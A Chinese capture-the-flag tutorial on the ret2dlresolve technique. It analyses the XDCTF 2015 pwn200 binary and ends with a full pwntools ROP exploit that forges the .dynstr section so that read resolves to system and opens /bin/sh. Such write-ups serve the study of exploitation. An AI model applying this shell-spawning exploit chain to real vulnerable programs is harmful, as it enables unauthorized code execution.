pwntools使用第五弹——ret2dlresolve
简介
关于ret2dlresolve利用的原理,可以参考如下博文:
https://www.freebuf.com/articles/system/170661.html
ret2dlsolve的核心原理就是利用了延迟绑定技术,linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了,关于延迟绑定可以参考如下博客:
http://rickgray.me/2015/08/07/use-gdb-to-study-got-and-plt/
题目链接
https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow/ret2dlresolve/2015-xdctf-pwn200
分析
我们以上述题目作为示例来演示分析一下ret2dlsolve的利用流程,题目的解析可同步参考如下博文:
https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/advanced-rop/ret2dlresolve/#roputil
no-relro-32
我们先分析一个最简单的示例——32位的no relro的可执行文件,对应题目目录的 32/no-relro/main_no_relro_32 文件
首先经过第一部分的学习,可以了解到延迟绑定需要用到动态链接相关的信息,这些信息在ELF格式的文件中可以通过.dynamic节来获取到,.dynamic节中存放了动态链接相关的节区的地址,可以通过访问.dynamic来获取到需要的内容所在节区的首地址,然后跳转到对应节区再获取需要的内容,.dynamic节的内容如下:
readelf -d main_no_relro_32
红框圈出来的两个节区,第一个是STRTAB类型的,对应的是ELF文件里的dynstr节,存放了动态链接文件的符号名的字符串;第二个是SYMTAB类型的,对应的是dynsym节,存放了动态链接符号表:
readelf -S main_no_relro_32
在本题中,因为没有开启relro,dynamic节是可读写的,因此我们的攻击思路为:将dynstr节的内容复制到一段可读写的内存中,然后将read字符串替换为system字符串,再把dynamic节中表示dynstr节的地址修改为我们新建的dynstr节所在的内存,这样在延迟绑定执行时获取read符号的名字时,因为是按照偏移获取,实际获取到的符号名就是system,然后调用read实际就是调用的system,然后我们把 /bin/sh 字符串写入到一段可读写内存中,把这段内存的地址作为参数传给system即可获取到shell。
为了实现上述思路,我们首先要找一段可读写的内存,使用gdb调试该程序,打开vmmap,我们发现bss段所在的内存是可读写的,因此我们可以直接把伪造的dynstr节和 /bin/sh 字符串放进bss段中:
找到可读写的内存后,我们需要分析一下dynamic节的内容,找到dynstr地址的存放位置并替换成我们需要的。linux中32位ELF文件的dynamic节每一项的值是存放在Elf32_Dyn结构体中的:
typedef struct {Elf32_Sword d_tag;union {Elf32_Word d_val;Elf32_Addr d_ptr;} d_un;
} Elf32_Dyn;
dynmaic节中就是存放了若干个上述结构体,因此每一项内容都会占用8字节内存,我们查看本题的dynamic节的成员:
发现dynstr是第9个成员,dynamic节的首地址为:0x080497c4,因此dynstr成员的首地址为:0x80497c4 + 8*8 = 0x8049804,这个地址对应的是Elf32_Dyn结构体的第一个成员,占用了4字节大小,dynstr节的地址存放在第二个成员里,地址为:0x8049804 + 4 = 0x8049808
或者直接用Ghidra分析dynamic节,可以明显看到存放dynstr节的地址的内存地址是多少:
拿到了bss段地址和dynamic中存放dynstr节的成员地址后,下一步就是分析溢出点和溢出值,这一步直接用Ghidra,很简单:
从main函数开始逐步分析,发现溢出点在vuln函数中,字符数组local_70的大小为104字节,但read函数从标准输入中读入了0x100字节,会造成溢出,结合gdb分析,可以发现读入112字节后,正好到vuln函数的返回地址处,也就是112 + addr就可以返回到addr指定的位置。
在本题,我们选择的是替换read为system,而read函数在我们构造rop链的过程中已经调用过了,因此构造好dynstr后,需要重新跳转到read函数第一次调用进入的流程,也就是重新走一次延迟绑定的流程,才能让我们的read函数绑定为system函数,因此rop链最后调用system函数的地方,不能直接返回read函数的plt地址,要返回延迟绑定流程的地址,这个地址我们直接使用gdb分析read函数第一次调用的位置可以看到:
第一次调用read函数,read@plt地址0x8048370会跳转到GOT表的0x80498c8地址,该地址的当前内容指向0x8048376地址,也就是延迟绑定的流程,执行完延迟绑定后,GOT地址0x80498c8里存放的值变成了read函数的实际位置:
因此,我们rop链如果想重新绑定read函数的地址,将其指向system函数,就不能直接返回到read@plt地址0x8048370,这样会直接跳转到read函数,而是需要返回到read函数指向延迟绑定流程的地址,也就是上面看到的0x8048376
经过上述分析我们拿到了可读写的地址、存放dynstr地址信息的成员的地址、read函数执行延迟绑定的地址0x8048376、payload的最大长度0x100以及溢出长度112,现在可以构造exp了,完整的exp如下:
from pwn import *elf = ELF("./main_no_relro_32") # 读取待攻击的二进制文件的内容,主要是为了获取dynstr节的内容
rop = ROP("./main_no_relro_32") # 获取目标二进制文件中可利用的gadgets,构造ROP攻击链offset = 112 # 溢出112字节后开始覆盖返回地址
rop.raw(offset*'a') # 溢出至返回地址
dynstr_addr = 0x8049804 + 4 # dynamic中存放的dynstr节地址信息的成员的地址
bss_addr = 0x80498e0 # bss段的起始地址,用于存放伪造的dynstr
str_addr = 0x80498e0 + 0x100 # 存放/bin/sh字符串的地址, dynstr的长度必须小于0x100,因为payload的长度不能超过0x100
read_addr = 0x8048376 # read函数第一次调用时,走延迟绑定的流程起始地址rop.read(0, dynstr_addr, 4) # 调用read函数,覆盖掉dynamic中存放的dynstr节的地址,覆盖的值从标准输入读入, 长度为4字节
dynstr = elf.get_section_by_name('.dynstr').data() # 从目标文件中读取原始的dynstr节的内容
dynstr = dynstr.replace(b'read', b'system') # 将原始节中的read字符串替换为system,构造伪造的dynstr节,这里也可以选择其他用到的动态链接符号,比如write
rop.read(0, bss_addr, len(dynstr)) # 将伪造的dynstr写入到bss段, 从标准输入中获取伪造的dynstr的值
rop.read(0, str_addr, len("/bin/sh\x00")) # 将 /bin/sh 字符串写入到bss段, 从标准输入中获取字符串
rop.raw(read_addr) # 重新跳转到首次调用read函数的流程,这次使用的是伪造的dynstr, 因此执行完延迟绑定后实际调用的函数为system
rop.raw(0xdeadbeef) # 填充字符串
rop.raw(str_addr) # system函数的参数,也就是 /bin/sh 字符串的地址assert(len(rop.chain())<=256) # rop链的长度不能大于0x100p = process("./main_no_relro_32") # 启动目标二进制文件
p.recvuntil('Welcome to XDCTF2015~!\n') # 执行到溢出点
p.send(rop.chain()) # 发送rop链
p.send(p32(bss_addr)) # 覆盖dynstr的地址为伪造的dynstr地址
p.send(dynstr) # 写入伪造的dynstr
p.send("/bin/sh\x00") # 写入system函数使用的参数
p.interactive()
执行上述exp即可获取到shell!
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- ASP.NET Core学习日记38
1.IdentifyModel 解析:OpenID Connect和OAuth 2.0客户端类库。 2.RSA公钥和私钥 解析: [1]IDS:RSA私钥用于加密,签发JWT [2]API:RSA公钥用于验证,分发使用 3.OIDC[OpenID Connect] 解析:认证协…...
2024/4/5 2:10:43 - 两轮无钥匙进入系统的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
报告页数: 150 图表数: 100 报告价格:16800 本文研究全球与中国市场两轮无钥匙进入系统的发展现状及未来发展趋势,分别从生产和消费的角度分析两轮无钥匙进入系统的主要生产地区、主要消费地区以及主要的生产商。重点分析全球与中国市场的主要厂商产品特…...
2024/4/20 5:30:14 - 分类袋的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
报告页数: 150 图表数: 100 报告价格:16800 本文研究全球与中国市场分类袋的发展现状及未来发展趋势,分别从生产和消费的角度分析分类袋的主要生产地区、主要消费地区以及主要的生产商。重点分析全球与中国市场的主要厂商产品特点、产品规格、不同规格产…...
2024/4/13 4:13:59 - 微信小程序把图片下载到本地相册(附源码)
微信小程序保存网络图片到本地实现流程: 1.把图片下载到本地相册 2.检查用户的授权状态(三种状态:未授权,已授权,未同意授权),判断是否授权保存图片的能力,如果是用户点击了不同意…...
2024/4/18 8:05:16 - MySQL高级之MySQL简介(一)
一、MySQL简介 MySQL是一个开放源代码的关系型数据库管理系统,由瑞典MySQL AB公司开发,后来被Sun公司收购,Sun公司后来又被Oracle公司收购,目前属于Oracle旗下产品。因为其速度、可靠性和适应性而备受众多互联网企业青睐。 二、…...
2024/4/14 22:01:25 - TS中的泛型
typescript 中 最难的无疑是泛型(Generices), 那么泛型出现的动机是什么呢 思考一个问题: 泛型是怎样出现的,它要解决那些问题 现在有一个 echo 方法,传入什么类型的值返回什么类型的值 function echo(arg) {return arg } const result echo(123)result 返回值是一个 any 类型…...
2024/5/2 8:37:05 - 组个最小数(题目不明白的速进)
给定数字0-9各若干个。你可以以任意顺序排列这些数字,但必须全部使用。目标是使得最后得到的数尽可能小(注意0不能做首位)。例如:给定两个0,两个1,三个5,一个8,我们得到的最小的数就…...
2024/4/20 2:25:09 - 事件修饰符
.stop:阻止事件继续传播.prevent 阻止标签默认行为.capture 使用事件捕获模式,即元素自身触发的事件先在此处处理,然后才交由内部元素进行处理.self 只当在 event.target 是当前元素自身时触发处理函数.once 事件将只会触发一次.passive 告诉浏览器你不想阻止事件的…...
2024/4/13 6:49:33 - 34 动态规划DP
背包问题分析法 1 01背包问题 1.1 朴素做法 /* 学acwing的算法基础课学来的,喜欢的话多多支持呀。 */ //01背包问题 朴素做法 #include<bits/stdc.h> using namespace std; const int N1e410; int n,m; int v[N],w[N];//v是体积,w是权重 int f[N…...
2024/4/13 6:49:48 - Pycharm Community安装教程
1.pycharm community下载: https://www.jetbrains.com/pycharm/download/#sectionwindows 2.下载后安装: 3.安装好之后,下载python 4.设置环境变量: 5.运行pycharm community...
2024/4/23 16:56:16 - Ubuntu更换阿里源和清华源
sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak sudo vim /etc/apt/sources.list #阿里源 deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiv…...
2024/4/13 6:49:48 - think-queue在window下实现进程守护代码【项目商业实战检验】
如题,让你可以不需要为了supervisor去部署linux系统 ::window进程守护,得来全不费功夫 echo off title 进程守护者::检测时间间隔,单位:秒 set _interval5::需要守护的进程名称 set _processNamephp.exe::需要守护的进程启动命令…...
2024/4/13 6:49:28 - 自制力的思考
自制力分为两种:热爱和痛苦 热爱---- 当开始真正热爱的事情,会努力解决达成目标前的所有困难。 痛苦---- 当遇到痛苦到无法忍受的事情,会拼劲全力摆脱困境。...
2024/4/20 13:19:05 - 力扣网-有效的括号
问题简介 编程思路 使用栈的思想进行编程当出现[{(是入栈的时机。右侧的括号则是出栈的时机。正常情况下,最后的字符串为空 编写程序 第一个版本 public boolean isValid(String s) {LinkedList<Character> characters new LinkedList<>();for (int…...
2024/4/8 18:49:55 - 青少年蓝桥杯省赛
👊蓝桥杯省赛考试范围-C赛项 1、基本数据类型及类型转换:整型(int,long long)、布尔型( bool)、字符型 (char)和实型(float,double)&a…...
2024/4/13 6:49:18 - 数据库学习-MySQL的索引
索引是通过某种算法,构建出一个数据模型,用于快速找出在某个列中有一特定值的行,不使用索引,MySQL必须从第一条记录开始读完整个表,知道找出相关的行,表越大,查询数据所花费的时间就越多&#x…...
2024/4/13 6:49:18 - 供应链与物流中的人工智能的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
报告页数: 150 图表数: 100 报告价格:16800 本文研究全球与中国市场供应链与物流中的人工智能的发展现状及未来发展趋势,分别从生产和消费的角度分析供应链与物流中的人工智能的主要生产地区、主要消费地区以及主要的生产商。重点分析全球与中国市场的主…...
2024/4/13 6:49:38 - HttpServer服务器工作流程(v2版本)
Author:老九 计算机专业 可控之事 沉重冷静 不可控之事 乐观面对 85180586qq.com 😄 😆 😵 😭 😰 😅 😢 😤 😍 ☺️ 😎 😩 👍 &#x…...
2024/4/17 7:10:12 - linux防火墙策略
systemctl命令 systemctl status firewalld.service查看防火墙的状态;systemctl start firewalld.service启动防火墙;systemctl stop firewalld.service关闭防火墙;systemctl restart firewalld.service重启防火墙;systemctl ena…...
2024/4/13 6:49:23 - APS(高级计划与排程)基本概念
APS(Advanced Planning and Scheduling) 高级计划与排程。通过为流程和离散的混合模型同时解决顺序和调度的优化问题,从而对项目管理与项目制造解决关键链和成本时间最小化。 离散行业:解决多工序、多资源的优化调度问题。 流程行业:解决顺序…...
2024/4/13 6:49:18
最新文章
- 【JAVA基础之反射】反射详解
🔥作者主页:小林同学的学习笔录 🔥mysql专栏:小林同学的专栏 1.反射 1.1 概述 是在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法; 对于任意一个对象,都能够调用它…...
2024/5/3 23:36:39 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - linux 搭建Samba服务
Samba简介 SAMBA是⼀个实现不同操作系统之间⽂件共享和打印机共享的⼀种SMB协议的免费软件, SMB(Server Message block)协议是window下所使⽤的⽂件共享协议,我们在linux系统或 者其类unix系统当中可以通过samba服务来实现SMB功能。 (1&…...
2024/5/3 16:26:59 - PostCss:详尽指南之安装和使用
引言 在现代前端开发中,CSS预处理器如Sass、Less等已经成为提升开发效率、增强代码可维护性的重要工具。然而,随着Web技术的发展,CSS的功能也在不断扩展,一些新的CSS语法(如变量、自定义属性、CSS Grid等)以…...
2024/5/2 5:02:14 - 浅聊什么是Redis?
需求:MySQL面临大量的查询,即读写操作,因此类比CPU,给数据加缓存,Redis诞生。应用程序从MySQL查询的数据,在Redis设置缓存(记录在内存中,无需IO操作),后再需要…...
2024/5/2 22:15:36 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/5/1 17:30:59 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/5/2 16:16:39 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/4/29 2:29:43 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/5/3 23:10:03 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/4/27 17:58:04 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/4/27 14:22:49 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/4/28 1:28:33 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/4/30 9:43:09 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/4/27 17:59:30 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/5/2 15:04:34 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/4/28 1:34:08 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/4/26 19:03:37 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/4/29 20:46:55 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/4/30 22:21:04 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/5/1 4:32:01 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/4/27 23:24:42 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/4/28 5:48:52 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/4/30 9:42:22 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/5/2 9:07:46 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/4/30 9:42:49 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57